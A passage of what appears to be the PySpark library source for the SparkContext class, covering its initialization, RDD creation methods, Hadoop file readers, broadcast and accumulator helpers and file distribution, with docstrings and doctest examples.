master : str, optional
Cluster URL to connect to (e.g. mesos://host:port, spark://host:port, local[4]).
appName : str, optional
A name for your job, to display on the cluster web UI.
sparkHome : str, optional
Location where Spark is installed on cluster nodes.
pyFiles : list, optional
Collection of .zip or .py files to send to the cluster
and add to PYTHONPATH. These can be paths on the local file
system or HDFS, HTTP, HTTPS, or FTP URLs.
environment : dict, optional
A dictionary of environment variables to set on
worker nodes.
batchSize : int, optional
The number of Python objects represented as a single
Java object. Set 1 to disable batching, 0 to automatically choose
the batch size based on object sizes, or -1 to use an unlimited
batch size
serializer : :class:`pyspark.serializers.Serializer`, optional
The serializer for RDDs.
conf : :py:class:`pyspark.SparkConf`, optional
An object setting Spark properties.
gateway : :py:class:`py4j.java_gateway.JavaGateway`, optional
Use an existing gateway and JVM, otherwise a new JVM
will be instantiated. This is only used internally.
jsc : :py:class:`py4j.java_gateway.JavaObject`, optional
The JavaSparkContext instance. This is only used internally.
profiler_cls : type, optional
A class of custom Profiler used to do profiling
(default is :class:`pyspark.profiler.BasicProfiler`).
Notes
-----
Only one :class:`SparkContext` should be active per JVM. You must `stop()`
the active :class:`SparkContext` before creating a new one.
:class:`SparkContext` instance is not supported to share across multiple
processes out of the box, and PySpark does not guarantee multi-processing execution.
Use threads instead for concurrent processing purpose.
Examples
--------
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> sc2 = SparkContext('local', 'test2') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError: ...
"""
_gateway = None
_jvm = None
_next_accum_id = 0
_active_spark_context = None
_lock = RLock()
_python_includes = None # zip and egg files that need to be added to PYTHONPATH
PACKAGE_EXTENSIONS = ('.zip', '.egg', '.jar')
def __init__(self, master=None, appName=None, sparkHome=None, pyFiles=None,
environment=None, batchSize=0, serializer=PickleSerializer(), conf=None,
gateway=None, jsc=None, profiler_cls=BasicProfiler):
if (conf is None or
conf.get("spark.executor.allowSparkContext", "false").lower() != "true"):
# In order to prevent SparkContext from being created in executors.
SparkContext._assert_on_driver()
self._callsite = first_spark_call() or CallSite(None, None, None)
if gateway is not None and gateway.gateway_parameters.auth_token is None:
raise ValueError(
"You are trying to pass an insecure Py4j gateway to Spark. This"
" is not allowed as it is a security risk.")
SparkContext._ensure_initialized(self, gateway=gateway, conf=conf)
try:
self._do_init(master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls)
except:
# If an error occurs, clean up in order to allow future SparkContext creation:
self.stop()
raise
def _do_init(self, master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls):
self.environment = environment or {}
# java gateway must have been launched at this point.
if conf is not None and conf._jconf is not None:
# conf has been initialized in JVM properly, so use conf directly. This represents the
# scenario that JVM has been launched before SparkConf is created (e.g. SparkContext is
# created and then stopped, and we create a new SparkConf and new SparkContext again)
self._conf = conf
else:
self._conf = SparkConf(_jvm=SparkContext._jvm)
if conf is not None:
for k, v in conf.getAll():
self._conf.set(k, v)
self._batchSize = batchSize # -1 represents an unlimited batch size
self._unbatched_serializer = serializer
if batchSize == 0:
self.serializer = AutoBatchedSerializer(self._unbatched_serializer)
else:
self.serializer = BatchedSerializer(self._unbatched_serializer,
batchSize)
# Set any parameters passed directly to us on the conf
if master:
self._conf.setMaster(master)
if appName:
self._conf.setAppName(appName)
if sparkHome:
self._conf.setSparkHome(sparkHome)
if environment:
for key, value in environment.items():
self._conf.setExecutorEnv(key, value)
for key, value in DEFAULT_CONFIGS.items():
self._conf.setIfMissing(key, value)
# Check that we have at least the required parameters
if not self._conf.contains("spark.master"):
raise RuntimeError("A master URL must be set in your configuration")
if not self._conf.contains("spark.app.name"):
raise RuntimeError("An application name must be set in your configuration")
# Read back our properties from the conf in case we loaded some of them from
# the classpath or an external config file
self.master = self._conf.get("spark.master")
self.appName = self._conf.get("spark.app.name")
self.sparkHome = self._conf.get("spark.home", None)
for (k, v) in self._conf.getAll():
if k.startswith("spark.executorEnv."):
varName = k[len("spark.executorEnv."):]
self.environment[varName] = v
self.environment["PYTHONHASHSEED"] = os.environ.get("PYTHONHASHSEED", "0")
# Create the Java SparkContext through Py4J
self._jsc = jsc or self._initialize_context(self._conf._jconf)
# Reset the SparkConf to the one actually used by the SparkContext in JVM.
self._conf = SparkConf(_jconf=self._jsc.sc().conf())
# Create a single Accumulator in Java that we'll send all our updates through;
# they will be passed back to us through a TCP server
auth_token = self._gateway.gateway_parameters.auth_token
self._accumulatorServer = accumulators._start_update_server(auth_token)
(host, port) = self._accumulatorServer.server_address
self._javaAccumulator = self._jvm.PythonAccumulatorV2(host, port, auth_token)
self._jsc.sc().register(self._javaAccumulator)
# If encryption is enabled, we need to setup a server in the jvm to read broadcast
# data via a socket.
# scala's mangled names w/ $ in them require special treatment.
self._encryption_enabled = self._jvm.PythonUtils.isEncryptionEnabled(self._jsc)
os.environ["SPARK_AUTH_SOCKET_TIMEOUT"] = \
str(self._jvm.PythonUtils.getPythonAuthSocketTimeout(self._jsc))
os.environ["SPARK_BUFFER_SIZE"] = \
str(self._jvm.PythonUtils.getSparkBufferSize(self._jsc))
self.pythonExec = os.environ.get("PYSPARK_PYTHON", 'python3')
self.pythonVer = "%d.%d" % sys.version_info[:2]
if sys.version_info[:2] < (3, 7):
with warnings.catch_warnings():
warnings.simplefilter("once")
warnings.warn(
"Python 3.6 support is deprecated in Spark 3.2.",
FutureWarning
)
# Broadcast's __reduce__ method stores Broadcast instances here.
# This allows other code to determine which Broadcast instances have
# been pickled, so it can determine which Java broadcast objects to
# send.
self._pickled_broadcast_vars = BroadcastPickleRegistry()
SparkFiles._sc = self
root_dir = SparkFiles.getRootDirectory()
sys.path.insert(1, root_dir)
# Deploy any code dependencies specified in the constructor
self._python_includes = list()
for path in (pyFiles or []):
self.addPyFile(path)
# Deploy code dependencies set by spark-submit; these will already have been added
# with SparkContext.addFile, so we just need to add them to the PYTHONPATH
for path in self._conf.get("spark.submit.pyFiles", "").split(","):
if path != "":
(dirname, filename) = os.path.split(path)
try:
filepath = os.path.join(SparkFiles.getRootDirectory(), filename)
if not os.path.exists(filepath):
# In case of YARN with shell mode, 'spark.submit.pyFiles' files are
# not added via SparkContext.addFile. Here we check if the file exists,
# try to copy and then add it to the path. See SPARK-21945.
shutil.copyfile(path, filepath)
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
sys.path.insert(1, filepath)
except Exception:
warnings.warn(
"Failed to add file [%s] specified in 'spark.submit.pyFiles' to "
"Python path:\n %s" % (path, "\n ".join(sys.path)),
RuntimeWarning)
# Create a temporary directory inside spark.local.dir:
local_dir = self._jvm.org.apache.spark.util.Utils.getLocalDir(self._jsc.sc().conf())
self._temp_dir = \
self._jvm.org.apache.spark.util.Utils.createTempDir(local_dir, "pyspark") \
.getAbsolutePath()
# profiling stats collected for each PythonRDD
if self._conf.get("spark.python.profile", "false") == "true":
dump_path = self._conf.get("spark.python.profile.dump", None)
self.profiler_collector = ProfilerCollector(profiler_cls, dump_path)
else:
self.profiler_collector = None
# create a signal handler which would be invoked on receiving SIGINT
def signal_handler(signal, frame):
self.cancelAllJobs()
raise KeyboardInterrupt()
# see http://stackoverflow.com/questions/23206787/
if isinstance(threading.current_thread(), threading._MainThread):
signal.signal(signal.SIGINT, signal_handler)
def __repr__(self):
return "<SparkContext master={master} appName={appName}>".format(
master=self.master,
appName=self.appName,
)
def _repr_html_(self):
return """
<div>
<p><b>SparkContext</b></p>
<p><a href="{sc.uiWebUrl}">Spark UI</a></p>
<dl>
<dt>Version</dt>
<dd><code>v{sc.version}</code></dd>
<dt>Master</dt>
<dd><code>{sc.master}</code></dd>
<dt>AppName</dt>
<dd><code>{sc.appName}</code></dd>
</dl>
</div>
""".format(
sc=self
)
def _initialize_context(self, jconf):
"""
Initialize SparkContext in function to allow subclass specific initialization
"""
return self._jvm.JavaSparkContext(jconf)
@classmethod
def _ensure_initialized(cls, instance=None, gateway=None, conf=None):
"""
Checks whether a SparkContext is initialized or not.
Throws error if a SparkContext is already running.
"""
with SparkContext._lock:
if not SparkContext._gateway:
SparkContext._gateway = gateway or launch_gateway(conf)
SparkContext._jvm = SparkContext._gateway.jvm
if instance:
if (SparkContext._active_spark_context and
SparkContext._active_spark_context != instance):
currentMaster = SparkContext._active_spark_context.master
currentAppName = SparkContext._active_spark_context.appName
callsite = SparkContext._active_spark_context._callsite
# Raise error if there is already a running Spark context
raise ValueError(
"Cannot run multiple SparkContexts at once; "
"existing SparkContext(app=%s, master=%s)"
" created by %s at %s:%s "
% (currentAppName, currentMaster,
callsite.function, callsite.file, callsite.linenum))
else:
SparkContext._active_spark_context = instance
def __getnewargs__(self):
# This method is called when attempting to pickle SparkContext, which is always an error:
raise RuntimeError(
"It appears that you are attempting to reference SparkContext from a broadcast "
"variable, action, or transformation. SparkContext can only be used on the driver, "
"not in code that it run on workers. For more information, see SPARK-5063."
)
def __enter__(self):
"""
Enable 'with SparkContext(...) as sc: app(sc)' syntax.
"""
return self
def __exit__(self, type, value, trace):
"""
Enable 'with SparkContext(...) as sc: app' syntax.
Specifically stop the context on exit of the with block.
"""
self.stop()
@classmethod
def getOrCreate(cls, conf=None):
"""
Get or instantiate a SparkContext and register it as a singleton object.
Parameters
----------
conf : :py:class:`pyspark.SparkConf`, optional
"""
with SparkContext._lock:
if SparkContext._active_spark_context is None:
SparkContext(conf=conf or SparkConf())
return SparkContext._active_spark_context
def setLogLevel(self, logLevel):
"""
Control our logLevel. This overrides any user-defined log settings.
Valid log levels include: ALL, DEBUG, ERROR, FATAL, INFO, OFF, TRACE, WARN
"""
self._jsc.setLogLevel(logLevel)
@classmethod
def setSystemProperty(cls, key, value):
"""
Set a Java system property, such as spark.executor.memory. This must
must be invoked before instantiating SparkContext.
"""
SparkContext._ensure_initialized()
SparkContext._jvm.java.lang.System.setProperty(key, value)
@property
def version(self):
"""
The version of Spark on which this application is running.
"""
return self._jsc.version()
@property
def applicationId(self):
"""
A unique identifier for the Spark application.
Its format depends on the scheduler implementation.
* in case of local spark app something like 'local-1433865536131'
* in case of YARN something like 'application_1433865536131_34483'
Examples
--------
>>> sc.applicationId # doctest: +ELLIPSIS
'local-...'
"""
return self._jsc.sc().applicationId()
@property
def uiWebUrl(self):
"""Return the URL of the SparkUI instance started by this SparkContext"""
return self._jsc.sc().uiWebUrl().get()
@property
def startTime(self):
"""Return the epoch time when the Spark Context was started."""
return self._jsc.startTime()
@property
def defaultParallelism(self):
"""
Default level of parallelism to use when not given by user (e.g. for
reduce tasks)
"""
return self._jsc.sc().defaultParallelism()
@property
def defaultMinPartitions(self):
"""
Default min number of partitions for Hadoop RDDs when not given by user
"""
return self._jsc.sc().defaultMinPartitions()
def stop(self):
"""
Shut down the SparkContext.
"""
if getattr(self, "_jsc", None):
try:
self._jsc.stop()
except Py4JError:
# Case: SPARK-18523
warnings.warn(
'Unable to cleanly shutdown Spark JVM process.'
' It is possible that the process has crashed,'
' been killed or may also be in a zombie state.',
RuntimeWarning
)
finally:
self._jsc = None
if getattr(self, "_accumulatorServer", None):
self._accumulatorServer.shutdown()
self._accumulatorServer = None
with SparkContext._lock:
SparkContext._active_spark_context = None
def emptyRDD(self):
"""
Create an RDD that has no partitions or elements.
"""
return RDD(self._jsc.emptyRDD(), self, NoOpSerializer())
def range(self, start, end=None, step=1, numSlices=None):
"""
Create a new RDD of int containing elements from `start` to `end`
(exclusive), increased by `step` every element. Can be called the same
way as python's built-in range() function. If called with a single argument,
the argument is interpreted as `end`, and `start` is set to 0.
Parameters
----------
start : int
the start value
end : int, optional
the end value (exclusive)
step : int, optional
the incremental step (default: 1)
numSlices : int, optional
the number of partitions of the new RDD
Returns
-------
:py:class:`pyspark.RDD`
An RDD of int
Examples
--------
>>> sc.range(5).collect()
[0, 1, 2, 3, 4]
>>> sc.range(2, 4).collect()
[2, 3]
>>> sc.range(1, 7, 2).collect()
[1, 3, 5]
"""
if end is None:
end = start
start = 0
return self.parallelize(range(start, end, step), numSlices)
def parallelize(self, c, numSlices=None):
"""
Distribute a local Python collection to form an RDD. Using range
is recommended if the input represents a range for performance.
Examples
--------
>>> sc.parallelize([0, 2, 3, 4, 6], 5).glom().collect()
[[0], [2], [3], [4], [6]]
>>> sc.parallelize(range(0, 6, 2), 5).glom().collect()
[[], [0], [], [2], [4]]
"""
numSlices = int(numSlices) if numSlices is not None else self.defaultParallelism
if isinstance(c, range):
size = len(c)
if size == 0:
return self.parallelize([], numSlices)
step = c[1] - c[0] if size > 1 else 1
start0 = c[0]
def getStart(split):
return start0 + int((split * size / numSlices)) * step
def f(split, iterator):
# it's an empty iterator here but we need this line for triggering the
# logic of signal handling in FramedSerializer.load_stream, for instance,
# SpecialLengths.END_OF_DATA_SECTION in _read_with_length. Since
# FramedSerializer.load_stream produces a generator, the control should
# at least be in that function once. Here we do it by explicitly converting
# the empty iterator to a list, thus make sure worker reuse takes effect.
# See more details in SPARK-26549.
assert len(list(iterator)) == 0
return range(getStart(split), getStart(split + 1), step)
return self.parallelize([], numSlices).mapPartitionsWithIndex(f)
# Make sure we distribute data evenly if it's smaller than self.batchSize
if "__len__" not in dir(c):
c = list(c) # Make it a list so we can compute its length
batchSize = max(1, min(len(c) // numSlices, self._batchSize or 1024))
serializer = BatchedSerializer(self._unbatched_serializer, batchSize)
def reader_func(temp_filename):
return self._jvm.PythonRDD.readRDDFromFile(self._jsc, temp_filename, numSlices)
def createRDDServer():
return self._jvm.PythonParallelizeServer(self._jsc.sc(), numSlices)
jrdd = self._serialize_to_jvm(c, serializer, reader_func, createRDDServer)
return RDD(jrdd, self, serializer)
def _serialize_to_jvm(self, data, serializer, reader_func, createRDDServer):
"""
Using py4j to send a large dataset to the jvm is really slow, so we use either a file
or a socket if we have encryption enabled.
Examples
--------
data
object to be serialized
serializer : :py:class:`pyspark.serializers.Serializer`
reader_func : function
A function which takes a filename and reads in the data in the jvm and
returns a JavaRDD. Only used when encryption is disabled.
createRDDServer : function
A function which creates a PythonRDDServer in the jvm to
accept the serialized data, for use when encryption is enabled.
"""
if self._encryption_enabled:
# with encryption, we open a server in java and send the data directly
server = createRDDServer()
(sock_file, _) = local_connect_and_auth(server.port(), server.secret())
chunked_out = ChunkedStream(sock_file, 8192)
serializer.dump_stream(data, chunked_out)
chunked_out.close()
# this call will block until the server has read all the data and processed it (or
# throws an exception)
r = server.getResult()
return r
else:
# without encryption, we serialize to a file, and we read the file in java and
# parallelize from there.
tempFile = NamedTemporaryFile(delete=False, dir=self._temp_dir)
try:
try:
serializer.dump_stream(data, tempFile)
finally:
tempFile.close()
return reader_func(tempFile.name)
finally:
# we eagerly reads the file so we can delete right after.
os.unlink(tempFile.name)
def pickleFile(self, name, minPartitions=None):
"""
Load an RDD previously saved using :meth:`RDD.saveAsPickleFile` method.
Examples
--------
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize(range(10)).saveAsPickleFile(tmpFile.name, 5)
>>> sorted(sc.pickleFile(tmpFile.name, 3).collect())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.objectFile(name, minPartitions), self)
def textFile(self, name, minPartitions=None, use_unicode=True):
"""
Read a text file from HDFS, a local file system (available on all
nodes), or any Hadoop-supported file system URI, and return it as an
RDD of Strings.
The text files must be encoded as UTF-8.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
Examples
--------
>>> path = os.path.join(tempdir, "sample-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello world!")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
['Hello world!']
"""
minPartitions = minPartitions or min(self.defaultParallelism, 2)
return RDD(self._jsc.textFile(name, minPartitions), self,
UTF8Deserializer(use_unicode))
def wholeTextFiles(self, path, minPartitions=None, use_unicode=True):
"""
Read a directory of text files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system
URI. Each file is read as a single record and returned in a
key-value pair, where the key is the path of each file, the
value is the content of each file.
The text files must be encoded as UTF-8.
If `use_unicode` is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
For example, if you have the following files:
.. code-block:: text
hdfs://a-hdfs-path/part-00000
hdfs://a-hdfs-path/part-00001
...
hdfs://a-hdfs-path/part-nnnnn
Do ``rdd = sparkContext.wholeTextFiles("hdfs://a-hdfs-path")``,
then ``rdd`` contains:
.. code-block:: text
(a-hdfs-path/part-00000, its content)
(a-hdfs-path/part-00001, its content)
...
(a-hdfs-path/part-nnnnn, its content)
Notes
-----
Small files are preferred, as each file will be loaded fully in memory.
Examples
--------
>>> dirPath = os.path.join(tempdir, "files")
>>> os.mkdir(dirPath)
>>> with open(os.path.join(dirPath, "1.txt"), "w") as file1:
... _ = file1.write("1")
>>> with open(os.path.join(dirPath, "2.txt"), "w") as file2:
... _ = file2.write("2")
>>> textFiles = sc.wholeTextFiles(dirPath)
>>> sorted(textFiles.collect())
[('.../1.txt', '1'), ('.../2.txt', '2')]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.wholeTextFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(use_unicode), UTF8Deserializer(use_unicode)))
def binaryFiles(self, path, minPartitions=None):
"""
Read a directory of binary files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system URI
as a byte array. Each file is read as a single record and returned
in a key-value pair, where the key is the path of each file, the
value is the content of each file.
Notes
-----
Small files are preferred, large file is also allowable, but may cause bad performance.
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.binaryFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(), NoOpSerializer()))
def binaryRecords(self, path, recordLength):
"""
Load data from a flat binary file, assuming each record is a set of numbers
with the specified numerical format (see ByteBuffer), and the number of
bytes per record is constant.
Parameters
----------
path : str
Directory to the input data files
recordLength : int
The length at which to split the records
"""
return RDD(self._jsc.binaryRecords(path, recordLength), self, NoOpSerializer())
def _dictToJavaMap(self, d):
jm = self._jvm.java.util.HashMap()
if not d:
d = {}
for k, v in d.items():
jm[k] = v
return jm
def sequenceFile(self, path, keyClass=None, valueClass=None, keyConverter=None,
valueConverter=None, minSplits=None, batchSize=0):
"""
Read a Hadoop SequenceFile with arbitrary key and value Writable class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is as follows:
1. A Java RDD is created from the SequenceFile or other InputFormat, and the key
and value Writable classes
2. Serialization is attempted via Pyrolite pickling
3. If this fails, the fallback is to call 'toString' on each key and value
4. :class:`PickleSerializer` is used to deserialize pickled objects on the Python side
Parameters
----------
path : str
path to sequencefile
keyClass: str, optional
fully qualified classname of key Writable class (e.g. "org.apache.hadoop.io.Text")
valueClass : str, optional
fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
keyConverter : str, optional
fully qualified name of a function returning key WritableConverter
valueConverter : str, optional
fully qualifiedname of a function returning value WritableConverter
minSplits : int, optional
minimum splits in dataset (default min(2, sc.defaultParallelism))
batchSize : int, optional
The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
minSplits = minSplits or min(self.defaultParallelism, 2)
jrdd = self._jvm.PythonRDD.sequenceFile(self._jsc, path, keyClass, valueClass,
keyConverter, valueConverter, minSplits, batchSize)
return RDD(jrdd, self)
def newAPIHadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for :py:meth:`SparkContext.sequenceFile`.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java
Parameters
----------
path : str
path to Hadoop file
inputFormatClass : str
fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
keyClass : str
fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
valueClass : str
fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
keyConverter : str, optional
fully qualified name of a function returning key WritableConverter
None by default
valueConverter : str, optional
fully qualified name of a function returning value WritableConverter
None by default
conf : dict, optional
Hadoop configuration, passed in as a dict
None by default
batchSize : int, optional
The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def newAPIHadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for :py:meth:`SparkContext.sequenceFile`.
Parameters
----------
inputFormatClass : str
fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
keyClass : str
fully qualified classname of key Writable class (e.g. "org.apache.hadoop.io.Text")
valueClass : str
fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
keyConverter : str, optional
fully qualified name of a function returning key WritableConverter
(None by default)
valueConverter : str, optional
fully qualified name of a function returning value WritableConverter
(None by default)
conf : dict, optional
Hadoop configuration, passed in as a dict (None by default)
batchSize : int, optional
The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for :py:meth:`SparkContext.sequenceFile`.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java.
path : str
path to Hadoop file
inputFormatClass : str
fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
keyClass : str
fully qualified classname of key Writable class (e.g. "org.apache.hadoop.io.Text")
valueClass : str
fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
keyConverter : str, optional
fully qualified name of a function returning key WritableConverter
(None by default)
valueConverter : str, optional
fully qualified name of a function returning value WritableConverter
(None by default)
conf : dict, optional
Hadoop configuration, passed in as a dict (None by default)
batchSize : int, optional
The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for :py:meth:`SparkContext.sequenceFile`.
Parameters
----------
inputFormatClass : str
fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
keyClass : str
fully qualified classname of key Writable class (e.g. "org.apache.hadoop.io.Text")
valueClass : str
fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
keyConverter : str, optional
fully qualified name of a function returning key WritableConverter
(None by default)
valueConverter : str, optional
fully qualified name of a function returning value WritableConverter
(None by default)
conf : dict, optional
Hadoop configuration, passed in as a dict (None by default)
batchSize : int, optional
The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def _checkpointFile(self, name, input_deserializer):
jrdd = self._jsc.checkpointFile(name)
return RDD(jrdd, self, input_deserializer)
def union(self, rdds):
"""
Build the union of a list of RDDs.
This supports unions() of RDDs with different serialized formats,
although this forces them to be reserialized using the default
serializer:
Examples
--------
>>> path = os.path.join(tempdir, "union-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
['Hello']
>>> parallelized = sc.parallelize(["World!"])
>>> sorted(sc.union([textFile, parallelized]).collect())
['Hello', 'World!']
"""
first_jrdd_deserializer = rdds[0]._jrdd_deserializer
if any(x._jrdd_deserializer != first_jrdd_deserializer for x in rdds):
rdds = [x._reserialize() for x in rdds]
gw = SparkContext._gateway
jvm = SparkContext._jvm
jrdd_cls = jvm.org.apache.spark.api.java.JavaRDD
jpair_rdd_cls = jvm.org.apache.spark.api.java.JavaPairRDD
jdouble_rdd_cls = jvm.org.apache.spark.api.java.JavaDoubleRDD
if is_instance_of(gw, rdds[0]._jrdd, jrdd_cls):
cls = jrdd_cls
elif is_instance_of(gw, rdds[0]._jrdd, jpair_rdd_cls):
cls = jpair_rdd_cls
elif is_instance_of(gw, rdds[0]._jrdd, jdouble_rdd_cls):
cls = jdouble_rdd_cls
else:
cls_name = rdds[0]._jrdd.getClass().getCanonicalName()
raise TypeError("Unsupported Java RDD class %s" % cls_name)
jrdds = gw.new_array(cls, len(rdds))
for i in range(0, len(rdds)):
jrdds[i] = rdds[i]._jrdd
return RDD(self._jsc.union(jrdds), self, rdds[0]._jrdd_deserializer)
def broadcast(self, value):
"""
Broadcast a read-only variable to the cluster, returning a :class:`Broadcast`
object for reading it in distributed functions. The variable will
be sent to each cluster only once.
"""
return Broadcast(self, value, self._pickled_broadcast_vars)
def accumulator(self, value, accum_param=None):
"""
Create an :class:`Accumulator` with the given initial value, using a given
:class:`AccumulatorParam` helper object to define how to add values of the
data type if provided. Default AccumulatorParams are used for integers
and floating-point numbers if you do not provide one. For other types,
a custom AccumulatorParam can be used.
"""
if accum_param is None:
if isinstance(value, int):
accum_param = accumulators.INT_ACCUMULATOR_PARAM
elif isinstance(value, float):
accum_param = accumulators.FLOAT_ACCUMULATOR_PARAM
elif isinstance(value, complex):
accum_param = accumulators.COMPLEX_ACCUMULATOR_PARAM
else:
raise TypeError("No default accumulator param for type %s" % type(value))
SparkContext._next_accum_id += 1
return Accumulator(SparkContext._next_accum_id - 1, value, accum_param)
def addFile(self, path, recursive=False):
"""
Add a file to be downloaded with this Spark job on every node.
The `path` passed can be either a local file, a file in HDFS
(or other Hadoop-supported filesystems), or an HTTP, HTTPS or
FTP URI.
To access the file in Spark jobs, use :meth:`SparkFiles.get` with the
filename to find its download location.
A directory can be given if the recursive option is set to True.
Currently directories are only supported for Hadoop-supported filesystems.
Notes
-----
A path can be added only once. Subsequent additions of the same path are ignored.
Examples
--------
>>> from pyspark import SparkFiles
>>> path = os.path.join(tempdir, "test.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("100")
>>> sc.addFile(path)
>>> def func(iterator):
... with open(SparkFiles.get("test.txt")) as testFile:
... fileVal = int(testFile.readline())
... return [x * fileVal for x in iterator]
>>> sc.parallelize([1, 2, 3, 4]).mapPartitions(func).collect()
[100, 200, 300, 400]
"""
self._jsc.sc().addFile(path, recursive)
def addPyFile(self, path):
"""
Add a .py or .zip dependency for all tasks to be executed on this
SparkContext in the future. The `path` passed can be either a local
file, a file in HDFS (or other Hadoop-supported filesystems), or an
HTTP, HTTPS or FTP URI.
Notes
-----
A path can be added only once. Subsequent additions of the same path are ignored.
"""
self.addFile(path)
(dirname, filename) = os.path.split(path) # dirname may be directory or HDFS/S3 prefix
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
# for tests in local mode
sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))
importlib.invalidate_caches()
def setCheckpointDir(self, dirName):
"""
Set the directory under which RDDs are going to be checkpointed. The
directory must be an HDFS path if running on a cluster.
"""
self._jsc.sc().setCheckpointDir(dirName)
@since(3.1)
def getCheckpointDir(self):
"""
Return the directory where RDDs are checkpointed. Returns None if no
checkpoint directory has been set.
"""
if not self._jsc.sc().getCheckpointDir().isEmpty():
return self._jsc.sc().getCheckpointDir().get()
return None
def _getJavaStorageLevel(self, storageLevel):
"""
Returns a Java StorageLevel based on a pyspark.StorageLevel.
"""
if not isinstance(storageLevel, StorageLevel):
raise TypeError("storageLevel must be of type pyspark.StorageLevel")
newStorageLevel = self._jvm.org.apache.spark.storage.StorageLevel
return newStorageLevel(storageLevel.useDisk,
storageLevel.useMemory,
storageLevel.useOffHeap,
storageLevel.deserialized,
storageLevel.replication)
def setJobGroup(self, groupId, description, interruptOnCancel=False):
"""
Assigns a group ID to all the jobs started by this thread until the group ID is set to a
different value or cleared.
Often, a unit of execution in an application consists of multiple Spark actions or jobs.
Application programmers can use this method to group all those jobs together and give a
group description. Once set, the Spark web UI will associate such jobs with this group.
The application can use :meth:`SparkContext.cancelJobGroup` to cancel all
running jobs in this group.
Notes
-----
If interruptOnCancel is set to true for the job group, then job cancellation will result
in Thread.interrupt() being called on the job's executor threads. This is useful to help
ensure that the tasks are actually stopped in a timely manner, but is off by default due
to HDFS-1208, where HDFS may respond to Thread.interrupt() by marking nodes as dead.
If you run jobs in parallel, use :class:`pyspark.InheritableThread` for thread
local inheritance, and preventing resource leak.
